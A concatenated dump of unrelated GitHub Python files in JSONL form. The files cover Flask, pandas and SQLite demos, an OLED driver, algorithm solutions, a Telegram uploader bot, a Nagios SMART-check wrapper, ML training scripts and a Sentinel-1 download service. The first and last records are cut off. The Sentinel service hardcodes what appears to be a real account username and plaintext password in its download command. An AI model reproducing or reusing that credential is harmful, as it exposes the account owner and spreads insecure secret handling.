message\nsend(formattedMessage)","repo_name":"NickGeek/WiN","sub_path":"Windows/send.py","file_name":"send.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"18837223847","text":"import cv2\nfrom flask import Flask, request, jsonify\n\napp = Flask(__name__)\n\ndef process_image(image_path):\n # Carregar a imagem usando o OpenCV\n image = cv2.imread(image_path)\n\n # Aplicar o processamento de imagem para determinar o percentual de gordura e carne\n # Aqui você precisa implementar a lógica específica para a sua aplicação\n\n # Exemplo de lógica simples para demonstração\n percent_gordura = 30.0\n percent_carne = 70.0\n\n return percent_gordura, percent_carne\n\n@app.route('/processar-imagem', methods=['POST'])\ndef processar_imagem():\n # Verificar se uma imagem foi enviada no formulário\n if 'imagem' not in request.files:\n return 'Nenhuma imagem encontrada'\n\n imagem = request.files['imagem']\n\n # Salvar a imagem em um arquivo temporário\n imagem_temporaria = 'caminho/para/temp/imagem.jpg'\n imagem.save(imagem_temporaria)\n\n # Processar a imagem\n percent_gordura, percent_carne = process_image(imagem_temporaria)\n\n # Retornar os resultados como um JSON\n return jsonify({'percent_gordura': percent_gordura, 'percent_carne': percent_carne})\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"Emerson19Reis/Projeto-Percentual-de-gordura","sub_path":"back.py","file_name":"back.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13423416108","text":"import pandas as pd\nimport numpy as np\n\ndf = pd.DataFrame({\"Nome\":[\"João da Silva\",\n \"Carlos Souza\",\n \"Maria Ferreira\"],\n \"Idade\":[22, 35, 58],\n \"Sexo\":[\"masculino\",\"masculino\",\"feminino\"]})\nprint(df,\"\\n\")\n\ns = pd.Series(np.random.randn(5), index=['a','b','c','d','e'])\nprint(s,'\\n')\n\nd = {'b':1, 'a':0, 'c':2}\nprint(pd.Series(d),'\\n')\n","repo_name":"Mutanne/hiworld","sub_path":"python/Ta4.py","file_name":"Ta4.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19794277608","text":"from PIL import Image\nfrom PIL import ImageDraw\n\nimport time\nimport signal\n\nfrom firob.core.worker.worker import Worker\nfrom robscreen import constants\n\nfrom pkg_resources import resource_filename\n\nimport robscreen.core.bakebit_128_64_oled as oled\nfrom robscreen.core.annuaire import Annuaire\n\n\nclass Screen(Worker):\n\n def __init__(self):\n Worker.__init__(self, 0.1)\n\n print(\"Init Screen\")\n oled.init() # initialze SEEED OLED display\n oled.clearDisplay() # clear the screen and set start position to top left corner\n oled.setNormalDisplay() # Set display to normal mode (i.e non-inverse mode)\n oled.setHorizontalMode() # Set addressing mode to Page Mode\n\n picture = resource_filename('robscreen.resources', 'firob.png')\n image = Image.open(picture).convert('1')\n oled.drawImage(image)\n \n self.__page = Annuaire.getInstance().getPage(Annuaire.PAGE_DEFAULT)\n \n time.sleep(1)\n\n def execute(self):\n image = Image.new('1', (constants.WIDTH, constants.HEIGHT))\n draw = ImageDraw.Draw(image)\n self.__page.draw(draw)\n oled.drawImage(image)\n\n def end(self):\n oled.clearDisplay()\n \n def k1(self):\n page_num = self.__page.k1()\n self.__page = Annuaire.getInstance().getPage(page_num)\n def k2(self):\n page_num = self.__page.k2()\n self.__page = Annuaire.getInstance().getPage(page_num)\n def k3(self):\n page_num = self.__page.k3()\n self.__page = Annuaire.getInstance().getPage(page_num)\n \n","repo_name":"GuillaumeEscande/robscreen","sub_path":"robscreen/core/screen.py","file_name":"screen.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13283000709","text":"# Section12-1\n# 파이썬 데이터베이스 연동(SQLite)\n# Structed Query language\n# 기초적인 데이터 삽입 수정 삭제 조회\n\n# cmd 실행할때 관리자 권한으로 실행하기\n\nimport sqlite3 # 기본 설치\nimport datetime\n\n# 삽입 날짜 생성\nnow = datetime.datetime.now()\nprint(now)\n# 2021-04-01 15:43:38.979971 현재일자 시간 호출\nnowDatetime = now.strftime('%Y-%m-%d %H:%M:%S')\nprint('nowDatetime : ' , nowDatetime) # nowDatetime : 2021-04-01 15:45:21\n# sqlite3\nprint('sqlite3.version: ', sqlite3.version ) # sqlite3.version: 2.6.0\nprint('sqlite3.sqlite.version: ', sqlite3.sqlite_version ) # sqlite3.sqlite.version: 3.33.0\n\n\n\n# DB 생성 & Auto commit (Rollback : 삽입 이전으로 시점을 되돌리는 것)\n\n# commit은 우리가 입력한 데이터를 메모리에 반영하는 것.\n\nconn = sqlite3.connect('D:/coding/python/all/ch1/resource/database.db', isolation_level=None)\n\n# Cursor \nc = conn.cursor()\nprint('Cursor type : ', type(c)) # Cursor type : \n\n\n# 테이블 생성 (Data Type : TEXT, NUMERIC, INTIGER, REAL, BLOB)\nc.execute(\"CREATE TABLE IF NOT EXISTS users(id INTIGER PRIMARY KEY, username text, email text, \\\n phone text, website text, regidate text)\")\n\n\n\n# 데이터 삽입 (한 번에 하나 씩 입력하는 방법)\n\nc.execute(\"INSERT INTO users VALUES(1, 'KIM', 'dk@naver.com', '010-4564-2524', 'KIMKIM.com', ?)\", (nowDatetime,))\n\nc.execute(\"INSERT INTO users(id, username, email, phone, website, regidate) VALUES(?,?,?,?,?,?)\",\n(2, \"park\", \"park@daum.net\",'010-5478-5554',\"we3.com\", nowDatetime))\n\n# # Many 삽입 (튜플, 리스트)\nuserlist = (\n (3, 'Lee', 'Lee@naver.com', \"010-4545-5442\", 'LEE.com', nowDatetime),\n (4, 'Cho', 'Cho@naver.com', \"010-4821-8763\", 'Cho.com', nowDatetime),\n (5, 'Yoo', 'Yoo@naver.com', '010-5432-8777', 'Yoo.com', nowDatetime),\n)\n\nc.executemany(\"INSERT INTO users(id, username, email, phone, website, regidate)\\\n VALUES (?,?,?,?,?,?)\", userlist)\n\n# 앞으로는 web 에서 다운 받은 입력받은 데이터를 sqlite를 통하여, database에 저장\n\n\n\n# 테이블 데이터 삭제\n# conn.execute(\"DELETE FROM users\") # 모든 데이터 삭제\n# 테이블 삭제하면서 몇개를 지웠는지 지워진 행수 호출하는 기능\n# print(\"users db deleted : \" , conn.execute(\"DELETE FROM users\").rowcount,\"rows\") \n# users db deleted : 5 rows\n\n\n\n# 커밋 : isoation_level=None 일 경우 자동 반영(Auto Commit)\n# conn.commit() 직접 커밋입력\n\n# 롤백 # 롤백은 오토실행이 안됨\n# conn.rollback()\n\n# 접속해제\n# conn.close()\n\n# 리소스를 썻으면 항상 닫아줘야 한다.\n\n\n\n\n\n\n\n","repo_name":"sangdong88/Python","sub_path":"All/Ch1/section12-1.py","file_name":"section12-1.py","file_ext":"py","file_size_in_byte":2648,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14383735254","text":"# coding=utf-8\nimport collections\nclass Solution:\n def combinationSum2(self, candidates, target):\n def dfs(pos: int, rest: int):\n nonlocal sequence\n if rest == 0:\n ans.append(sequence[:])\n return\n if pos == len(freq) or rest < freq[pos][0]:\n return\n\n dfs(pos + 1, rest)\n\n most = min(rest // freq[pos][0], freq[pos][1])\n for i in range(1, most + 1):\n sequence.append(freq[pos][0])\n dfs(pos + 1, rest - i * freq[pos][0])\n sequence = sequence[:-most]\n\n freq = sorted(collections.Counter(candidates).items())\n ans = list()\n sequence = list()\n dfs(0, target)\n return ans\nans = Solution().combinationSum2([10,1,2,7,6,1,5], 8)","repo_name":"xiawq1/leetcode-c-","sub_path":"leetcode/combinationSum2.py","file_name":"combinationSum2.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12369880295","text":"import contextlib\nimport shutil\nimport tempfile\n\n\n@contextlib.contextmanager\ndef NamedTemporaryDirectory(suffix='', prefix='tmp', dir=None):\n \"\"\"A context manager that manages a temporary directory.\n\n This is a context manager version of tempfile.mkdtemp. The arguments to this\n function are the same as the arguments for that one.\n \"\"\"\n # This uses |dir| as a parameter name for consistency with mkdtemp.\n # pylint: disable=redefined-builtin\n\n d = tempfile.mkdtemp(suffix=suffix, prefix=prefix, dir=dir)\n try:\n yield d\n finally:\n shutil.rmtree(d)\n","repo_name":"kiwibrowser/src","sub_path":"third_party/android_tools/sdk/platform-tools/systrace/catapult/common/py_utils/py_utils/tempfile_ext.py","file_name":"tempfile_ext.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":2475,"dataset":"github-code","pt":"52"} +{"seq_id":"16405668467","text":"#!/usr/bin/env python3\n\n\n### Importing\nfrom botModule.importCommon import *\n\n\n### Start & Help Handler\n@Client.on_message(filters.private & filters.regex(r'^http(.*)'))\nasync def urlUploaderHandler(bot:Update, msg:Message):\n if await search_user_in_community(bot, msg):\n userid = msg.chat.id\n result = apiExist(userid)\n if result:\n apiKey = result['apiKey']\n apiUrl = f\"https://doodapi.com/api/upload/url?key={apiKey}\"\n message = msg.text\n if '|' in message:\n url, filename = message.split(\"|\")\n filename = filename.strip()\n if \" \" in filename:\n filename = '_'.join(filename.split(' '))\n apiUrl += f\"&new_title={filename}\"\n else:\n url = msg.text\n if \" \" in url:\n return await msg.reply_text(\n \"Gɪᴠᴇɴ Uʀʟ Is Iɴᴠᴀʟɪᴅ.\",\n parse_mode = \"html\"\n )\n url = url.strip()\n apiUrl += f\"&url={url}\"\n fileID = uploadRequest(apiUrl)\n if fileID:\n fileurl = f'https://dood.la/d/{fileID}'\n await msg.reply_text(\n f\"Yᴏᴜʀ Fɪʟᴇ Wɪʟʟ Bᴇ Uᴘʟᴏᴀᴅᴇᴅ Sᴏᴏɴ Oɴ Tʜɪs Uʀʟ :\\n{fileurl}\",\n parse_mode = \"html\"\n )\n else:\n await msg.reply_text(\n \"Uɴᴀʙʟᴇ Tᴏ Uᴘʟᴏᴀᴅ Yᴏᴜʀ Fɪʟᴇ. Sᴏᴍᴇᴛʜɪɴɢ Wᴇɴᴛ Wʀᴏɴɢ.\",\n parse_mode = \"html\"\n )\n else:\n await msg.reply_text(\n \"Yᴏᴜʀ Aᴘɪ Kᴇʏ Is Nᴏᴛ Aᴅᴅᴇᴅ\\nAᴅᴅ Yᴏᴜʀ Aᴘɪ Kᴇʏ Bʏ Usɪɴɢ /add APIKEY.\",\n parse_mode = \"html\"\n ) \n return\n\n","repo_name":"aiombots/AIOM_DOODSTREAM_BOT","sub_path":"plugins/uploader.py","file_name":"uploader.py","file_ext":"py","file_size_in_byte":1961,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"20536752581","text":"#!/usr/bin/env python3\n\n# This is a wrapper for check_smart.pl\n# It will find all disks on the host and run check_smart.pl on each of them\n# and report back to nagios the worst response with a summary of the rest.\n# Notice that for smartctl to function as properly, it needs to run as root.\n\nfrom enum import IntEnum\nimport re\nimport subprocess\n\n\nclass NagiosRes(IntEnum):\n OK = 0\n WARNING = 1\n CRITICAL = 2\n UNKNOWN = 3\n\n\n# For the summary\nnagios_res_count = {\n \"OK\": 0,\n \"WARNING\": 0,\n \"CRITICAL\": 0,\n \"UNKNOWN\": 0,\n}\n\ntry:\n serials = []\n # Scan\n drives = (\n subprocess.check_output([\"sudo\", \"/usr/sbin/smartctl\", \"--scan-open\"])\n .decode()\n .splitlines()\n )\n drives_check_smart = []\n worst_nagios_res = 0 # OK\n p_serial = re.compile(r\"serial number: +(\\b.*\\b)\", re.IGNORECASE)\n p_smart_support = re.compile(r\"SMART support is: +(\\b.*\\b)\", re.IGNORECASE)\n\n for drive in drives:\n\n # drives that smartctl can't open\n if re.match(\"^#\", drive):\n continue\n\n # get the device name and device_type\n device, _, device_type, _ = drive.split(' ', 3)\n\n # in some situations smartctl might report the drives multiple times\n # we use the serial to check if we've seen the drive before\n smart_data = subprocess.check_output(\n [\"sudo\", \"/usr/sbin/smartctl\", \"-i\", device, \"-d\", device_type]\n ).decode()\n\n result = p_serial.search(smart_data)\n if result:\n # check for smart support\n result_smart_support = p_smart_support.search(smart_data)\n if result_smart_support:\n smart_unknown = \"Unavailable - device lacks SMART capability\"\n if result_smart_support.group(1) == smart_unknown:\n continue\n\n serial = result.group(1)\n # seen the drive before\n if serial in serials:\n continue\n\n # first time seeing the drive\n serials.append(serial)\n try:\n # Run the external per disk nagios check\n nagios_check = subprocess.check_output(\n [\n \"/usr/local/lib/nagios/plugins/check_smart.pl\",\n \"-d\",\n device,\n \"-i\",\n device_type,\n ]\n ).decode()\n # will only reach here if the return value from the check\n # is 0 (== \"OK\")\n nagios_res_count[\"OK\"] += 1\n except subprocess.CalledProcessError as nagiosexc:\n nagios_check = nagiosexc.output.decode()\n\n # Critical is worse than Warning\n # Warning is worse than Unknown\n # Unknown is worse than OK\n\n # If the current return code is UNKNOWN\n # we only elevate the worst if it was OK\n if (nagiosexc.returncode == NagiosRes.UNKNOWN\n and worst_nagios_res == NagiosRes.OK):\n worst_nagios_res = NagiosRes.UNKNOWN\n # Else If the current return code is WARNING\n # we only elevate the worst if it was OK or UNKNOWN\n elif (nagiosexc.returncode == NagiosRes.WARNING\n and (worst_nagios_res == NagiosRes.OK\n or worst_nagios_res == NagiosRes.UNKNOWN)):\n worst_nagios_res = NagiosRes.WARNING\n # Else If the current return code is CRITICAL\n # we always elevate as critical it the worst\n elif nagiosexc.returncode == NagiosRes.CRITICAL:\n worst_nagios_res = NagiosRes.CRITICAL\n\n nagios_res_count[NagiosRes(nagiosexc.returncode).name] += 1\n\n drives_check_smart.append(nagios_check)\n\n # If there are no serials (drives) found return unknown\n if len(serials) == 0:\n print('UNKNOWN: No drives found.')\n\n exit(NagiosRes.UNKNOWN)\n\n else:\n print(f'{NagiosRes(worst_nagios_res).name}: SMART checks result: '\n f'{str(nagios_res_count)}')\n\n for item in drives_check_smart:\n print(item.strip())\n\n exit(worst_nagios_res)\n\nexcept Exception as e:\n print(f'{NagiosRes.UNKNOWN.name}: Script failure: {e}')\n\n exit(NagiosRes.UNKNOWN)\n","repo_name":"NeCTAR-RC/puppet-physical","sub_path":"files/check_smart_wrapper.py","file_name":"check_smart_wrapper.py","file_ext":"py","file_size_in_byte":4417,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"17451118138","text":"\n\"\"\"\nAnalysis of Salaries Data ( Hand On Activity )\n\n1. Which Male and Female Professor has the highest and the lowest salaries\n2. Which Professor takes the highest and lowest salaries.\n3. Missing Salaries - should be mean of the matching salaries of those \n whose service is the same\n4. Missing phd - should be mean of the matching service \n5. How many are Male Staff and how many are Female Staff. \n Show both in numbers and Graphically using Pie Chart. \n Show both numbers and in percentage\n6. How many are Prof, AssocProf and AsstProf. \n Show both in numbers adn Graphically using a Pie Chart\n7. Who are the senior and junior most employees in the organization.\n8. Draw a histogram of the salaries divided into bin starting \n from 50K and increment of 15K\n\"\"\"\n\n\n\n\n\nimport pandas as pd\n\ndf = pd.read_csv(\"Salaries.csv\")\n\n# 1. Which Male and Female Professor has the highest and the lowest salaries\n\n\ndf1 = df[(df[\"salary\"]==df[(df['sex']== \"Female\") & (df[\"rank\"] == \"Prof\")][\"salary\"].min())]\nprint(df1)\n\n# 2. Which Professor takes the highest and lowest salaries.\n\ndf1 = df[(df[\"salary\"]==df[(df[\"rank\"] == \"Prof\")][\"salary\"].min())]\nprint(df1)\n\n\ndf2 = df[(df[\"salary\"]==df[(df[\"rank\"] == \"Prof\")][\"salary\"].max())]\nprint(df2)\n\n\n\n\n\n# 3. Missing Salaries - should be mean of the matching salaries of those \n# whose service is the same\n\ndf2 =df[(df[\"service\"] == 18)][\"salary\"].mean()\n\ndf1 =df[(df[\"service\"] == 18)]\n\ndf1 = df1.fillna(df2)\n\n\nprint(df1)\n\n\ndf3 =df[(df[\"service\"] == 2)][\"salary\"].mean()\n\ndf4 =df[(df[\"service\"] == 2)]\n\ndf4 = df4.fillna(df3)\n\nprint(df4)\n\n########## or ###########\n\nfor i in df[df[\"salary\"].isnull()][\"service\"].values:\n \n df4 =df[(df[\"service\"] == i)]\n df3 =df[(df[\"service\"] == i)][\"salary\"].mean()\n df4 = df4.fillna(df3)\n print(df4)\n\n\n\n\n\n# 4. Missing phd - should be mean of the matching service \n\n\nfor i in df[df[\"phd\"].isnull()][\"service\"].values:\n \n df4 =df[(df[\"service\"] == i)]\n df3 =df[(df[\"service\"] == i)][\"phd\"].mean()\n df4 = df4.fillna(df3)\n print(df4)\n\n\n\n\n\n\n\n\n# 5. How many are Male Staff and how many are Female Staff. \n# Show both in numbers and Graphically using Pie Chart. \n# Show both numbers and in percentage\n\n\ndf[\"sex\"].value_counts()\n\n\ndf[\"sex\"].value_counts(normalize = True)\n\nimport matplotlib.pyplot as plt\n\nlabels = \"Male\",\"female\"\nsizes = [df[\"sex\"].value_counts()[0],df[\"sex\"].value_counts()[1]]\nexplode = 0,0\ncolors = [\"yellow\",\"pink\"]\nplt.pie(sizes,explode,labels,colors, autopct='%1.2f%%', shadow=True)\nplt.show()\n\n\n\n\n\n\n\n# 6. How many are Prof, AssocProf and AsstProf. \n# Show both in numbers adn Graphically using a Pie Chart\n\n\nprint(df[\"rank\"].value_counts())\n\nimport matplotlib.pyplot as plt\n\nlabels = df[\"rank\"].value_counts().index[0],df[\"rank\"].value_counts().index[1],df[\"rank\"].value_counts().index[2]\n\nsizes = [df[\"rank\"].value_counts().values[0],df[\"rank\"].value_counts().values[1],df[\"rank\"].value_counts().values[2]]\n\nexplode = 0,0,0\n\ncolors = [\"R\",\"G\",\"B\"]\n\nplt.pie(sizes,explode,labels,colors , autopct = '%1.2f%%', shadow = True)\nplt.show()\n\n\n\n\n\n\n\n# 7. Who are the senior and junior most employees in the organization.\n\n\ndf[\"service\"].sort_values().head()\n\ndf['service'].sort_values().tail()\n\n\n\n\n# 8. Draw a histogram of the salaries divided into bin starting \n# from 50K and increment of 15K\n\n\n\n\n\nimport matplotlib.pyplot as plt\n\na = df[\"salary\"].sort_values().values\n\nplt.hist(a, bins = [50000,65000,80000,95000,110000,125000,140000,155000,170000,185000,200000])\n\nplt.axis(25000,215000)\n\nplt.xlabel(\"salary\")\n\nplt.ylabel(\"candidate\")\n\nplt.show()\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Kamesh-Mishra/Data_Science","sub_path":"Data Analytics/hands_on_activity.py","file_name":"hands_on_activity.py","file_ext":"py","file_size_in_byte":3604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40104530714","text":"import requests\nimport os\nfrom bs4 import BeautifulSoup\n\n# Read the HTML file as a string\nwith open(\"example.html\", \"r\") as f:\n html_string = f.read()\n\n# Parse the HTML content using BeautifulSoup\nsoup = BeautifulSoup(html_string, \"html.parser\")\n\n# Extract all image tags from the HTML and get the src attribute for each one\nimage_urls = []\nfor img in soup.find_all(\"img\"):\n image_urls.append(img.get(\"src\"))\n\n# Create the images directory if it doesn't exist\nif not os.path.exists(\"./images\"):\n os.makedirs(\"./images\")\n\n# Download each image into the images directory\nfor url in image_urls:\n response = requests.get(url)\n filename = url.split(\"/\")[-1]\n with open(\"./images/\" + filename, \"wb\") as f:\n f.write(response.content)\n\n# Print a message indicating that the download is complete\nprint(\"Images downloaded successfully!\")\n\n","repo_name":"jinpeng/codesnippets","sub_path":"python/extract_text_image_from_html.py","file_name":"extract_text_image_from_html.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71155157286","text":"# ver1) itertools 쓰니까 memory exceed... ㅎ_ㅎ\n\n\n\n# from itertools import permutations\n\n# T = int(input())\n\n\n# for t in range(1, T+1):\n# N = int(input())\n# counts = list(map(int, input().split()))\n# nums = list(map(int,input().split()))\n# ops = '+-*/'\n# operators = []\n# for i in range(4):\n# for j in range(counts[i]):\n# operators.append(ops[i])\n\n# answer = []\n\n# for p in permutations(operators):\n# result = nums[0]\n# for n in range(N-1):\n# if p[n] == '+':\n# result = result + nums[n+1]\n# elif p[n] == '-':\n# result = result - nums[n+1]\n# elif p[n] == '*':\n# result = result * nums[n+1]\n# elif p[n] == '/':\n# result = int(result/nums[n+1])\n# answer.append(result)\n \n# print('#{} {}'.format(t, max(answer) - min(answer)))\n\n\n\n# ver 2)\n\nT = int(input())\n\ndef f(n, total):\n global min_val, max_val\n if n >= N:\n max_val = max(max_val,total)\n min_val = min(min_val,total)\n return\n else:\n for i in range(4):\n if operators[i] > 0:\n operators[i] -= 1\n\n if i == 0:\n f(n+1, total + nums[n])\n elif i ==1:\n f(n+1, total - nums[n])\n elif i ==2:\n f(n+1, total * nums[n])\n elif i ==3:\n f(n+1, int(total/nums[n]))\n\n operators[i] +=1\n\nfor t in range(1, T+1):\n N = int(input())\n operators = list(map(int, input().split()))\n nums = list(map(int,input().split()))\n\n min_val = 10000000\n max_val = -10000000\n\n f(1, nums[0])\n \n print('#{} {}'.format(t, max_val - min_val))","repo_name":"chloe-codes1/algorithm","sub_path":"SW-Expert-Academy/모의_SW_역량테스트/4008_숫자_만들기.py","file_name":"4008_숫자_만들기.py","file_ext":"py","file_size_in_byte":1796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22494763228","text":"from tensorflow.keras.applications import VGG16\nfrom tensorflow.keras import models\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.layers import (\n concatenate, Dense, Dropout, BatchNormalization, Flatten, Input,\n)\n\n\ndef build_vgg16_single_input(input_shape=(256, 256, 3)):\n \"\"\"Corresponds to model_vgg_ver2 of Modelling.ipynb file\"\"\"\n # Single input VGG16 transfer learn\n vgg_base = VGG16(weights='imagenet', include_top=False, input_shape=input_shape)\n\n model = models.Sequential()\n\n model.add(vgg_base)\n model.add(Flatten())\n model.add(Dropout(rate=0.4))\n model.add(Dense(128, activation='relu'))\n model.add(Dense(1, activation='sigmoid'))\n\n vgg_base.trainable = False\n\n return model\n\n\ndef build_vgg16_double_input(input_shape=(256, 256, 3)):\n \"\"\"Corresponds to model_10 of Modelling.ipynb file\"\"\"\n # Double input VGG16 transfer learn\n vgg_base = VGG16(weights='imagenet', include_top=False, input_shape=input_shape)\n\n # define two sets of inputs\n zoom_1 = Input(shape=input_shape)\n zoom_2 = Input(shape=input_shape)\n\n # process zoom level 1 patch\n conv_1 = vgg_base(zoom_1)\n flatten_1 = Flatten()(conv_1)\n\n # process zoom level 2 patch\n conv_2 = vgg_base(zoom_2)\n flatten_2 = Flatten()(conv_2)\n\n # combine output of convolutional layers\n combined = concatenate([flatten_1, flatten_2])\n combined = BatchNormalization()(combined)\n combined = Dropout(rate=0.4)(combined)\n\n # fully connected layer after combined outputs\n z = Dense(128, activation=\"relu\")(combined)\n z = BatchNormalization()(z)\n z = Dropout(rate=0.4)(z)\n z = Dense(1, activation=\"sigmoid\")(z)\n\n vgg_base.trainable = False\n\n model = Model(inputs=[zoom_1, zoom_2], outputs=z)\n\n return model\n","repo_name":"lazysjb/camelyon16","sub_path":"models/model_build.py","file_name":"model_build.py","file_ext":"py","file_size_in_byte":1781,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"12205964970","text":"import os\r\nimport sys\r\nimport json\r\nimport importlib\r\nfrom datetime import datetime\r\nimport jittor as jt\r\nfrom network import Network\r\nfrom dataset import ShapeNet\r\n\r\n\r\ndef prepare(config):\r\n jt.flags.use_cuda = 1\r\n os.makedirs(config['experiment']['dir'])\r\n with open(os.path.join(config['experiment']['dir'], 'config.json'), 'w') as f:\r\n json.dump(config, f, indent=4)\r\n src_dir = os.path.join(config['experiment']['dir'], 'src')\r\n os.makedirs(src_dir)\r\n os.system('cp *.py ' + src_dir)\r\n os.makedirs(config['experiment']['ckpt_save_dir'])\r\n\r\n\r\ndef train(config):\r\n prepare(config)\r\n train_dataset = ShapeNet(config['train_dataset'])\r\n network = Network(config['network'], len(train_dataset.split))\r\n decoder_optimizer = jt.nn.Adam(network.decoder.parameters(), config['train']['decoder_init_lr'])\r\n decoder_lr_scheduler = jt.lr_scheduler.StepLR(decoder_optimizer, step_size=config['train']['decoder_lr_decay_step'], gamma=config['train']['decoder_lr_decay_rate'])\r\n latent_codes_optimizer = jt.nn.Adam(network.code_cloud.parameters(), config['train']['latent_codes_init_lr'])\r\n latent_codes_lr_scheduler = jt.lr_scheduler.StepLR(latent_codes_optimizer, step_size=config['train']['latent_codes_lr_decay_step'], gamma=config['train']['latent_codes_lr_decay_rate'])\r\n\r\n network.train()\r\n for epoch in range(config['train']['num_epoch']):\r\n print('****** %s ******\\ntime: %s\\nepoch: %d/%d' % (config['experiment']['name'], datetime.now().strftime('%Y-%m-%d %H:%M:%S'), epoch, config['train']['num_epoch']))\r\n for batch_idx, (query_points, gt_sd, indices) in enumerate(train_dataset):\r\n pred_sd = network(indices, query_points)\r\n loss_dict = network.loss(gt_sd)\r\n decoder_optimizer.zero_grad()\r\n decoder_optimizer.step(loss_dict['total_loss'])\r\n latent_codes_optimizer.zero_grad()\r\n latent_codes_optimizer.step(loss_dict['total_loss'])\r\n print('Current epoch progress: %d/%d...' % (batch_idx, len(train_dataset)), end='\\r')\r\n print(datetime.now().strftime('%Y-%m-%d %H:%M:%S'), 'Current epoch progress: %d/%d. Done.' % (len(train_dataset), len(train_dataset)))\r\n decoder_lr_scheduler.step()\r\n latent_codes_lr_scheduler.step()\r\n\r\n for k, v in loss_dict.items():\r\n print(k, ':', v.numpy()[0])\r\n print('decoder lr :', decoder_optimizer.lr)\r\n print('latent codes lr :', latent_codes_optimizer.lr)\r\n\r\n network.decoder.save(os.path.join(config['experiment']['ckpt_save_dir'], 'decoder.pkl'))\r\n network.code_cloud.save(os.path.join(config['experiment']['ckpt_save_dir'], 'latent_codes.pkl'))\r\n print('Trained models are saved to', config['experiment']['ckpt_save_dir'])\r\n\r\n\r\nif __name__ == '__main__':\r\n config = importlib.import_module(sys.argv[1]).config\r\n train(config)\r\n","repo_name":"lity20/DCCDIF-jittor","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2879,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"52"} +{"seq_id":"73175826726","text":"\"\"\"Basic sentinelsat WPS implemenation.\"\"\"\nfrom pywps import EO4AProcess # Import the EO4AProcess class\nfrom pywps import ComplexInput, LiteralInput, LiteralOutput\nfrom pywps.inout.literaltypes import AllowedValue\nfrom pywps.validator.allowed_value import ALLOWEDVALUETYPE\nfrom pywps import UOM\nimport os\n\n# WPS Format validation\nfrom pywps import Format\nfrom pywps.validator.mode import MODE\nfrom pywps.app.Common import Metadata\n\n__author__ = 'ajuracic'\n\n\nclass SentinelDownload(EO4AProcess):\n \"\"\"Basic SentinelSat download of Sentinel 1 WPS service.\n\n Parameters\n ----------\n search_polygon: GeoJson region\n start_date: Start date YYYYMMDD\n end_date: End date YYYYMMDD\n\n Returns\n ----------\n output_dir: The path to the downloaded sentinel products\n \"\"\"\n\n def __init__(self):\n \"\"\"Sample.\"\"\"\n inputs = [\n ComplexInput(\n 'search_polygon', 'GeoJSON region',\n supported_formats=[Format('application/vnd.geo+json')],\n abstract=\"\"\"\n GeoJson of region to search\n \"\"\",\n mode=MODE.SIMPLE,\n max_occurs=1\n ),\n LiteralInput(\n 'start_date', 'Start date',\n abstract=\"\"\"\n Datestamp in format YYYYMMDD\n \"\"\",\n data_type='integer',\n max_occurs=1\n ),\n LiteralInput(\n 'end_date', 'End date',\n abstract=\"\"\"\n Datestamp in format YYYYMMDD\n \"\"\",\n data_type='integer',\n max_occurs=1\n )\n ]\n outputs = [\n LiteralOutput(\n 'output_dir',\n 'Workflow data volume path',\n data_type='string',\n abstract=\"\"\"\n Path to a directory within the Workflow Data volume.\n The service will store all outputs in this dir, then\n provide a reference to the directory which other services\n can use.\n \"\"\",\n )\n ]\n\n super(SentinelDownload, self).__init__(\n identifier='acquisition:sentinel1',\n abstract=\"\"\"\n Use sentinelsat python module to download Sentinel 1 data\n \"\"\",\n version='0.1',\n title=\"Download Sentinel 1 Data (referencing data volume)\",\n metadata=[Metadata('Testing')],\n profile='',\n inputs=inputs,\n outputs=outputs,\n )\n\n def get_command(self, request, response):\n \"\"\"The service command. Do not do any processing here.\"\"\"\n inputs = request.inputs\n self.sen1_dir = '/data_service/'\n #self.mkdir(self.sen1_dir)\n # Query, include only L2, OCN data\n self.query = \"producttype=OCN\"\n return [\n \"sentinel\", \"search\", \"--sentinel1\", \"-d\",\n \"-s\", str(inputs['start_date'][0].source),\n \"-e\", str(inputs['end_date'][0].source),\n \"-q\", str(self.query),\n \"-p\", str(self.sen1_dir),\n \"ajuracic\", \"S1lj0M1k1!\",\n inputs['search_polygon'][0].file\n ]\n\n def set_output(self, request, response):\n \"\"\"Set the output from the WPS request.\"\"\"\n workflow_disk_result_path = self.get_workflow_disk_path(self.sen1_dir)\n response.outputs['output_dir'].data = workflow_disk_result_path\n response.outputs['output_dir'].uom = UOM('unity')\n","repo_name":"anajura-ps/eo4a-sswind-services","sub_path":"acquisition:sentinel1/wps_definition.py","file_name":"wps_definition.py","file_ext":"py","file_size_in_byte":3539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15240919900","text":"class Mileage :\r\n def route_mileage(time, del1, del2, del3):\r\n # calculate miles unless query time is less than delivery start time\r\n # Space-Time Complexity: O(1)\r\n def 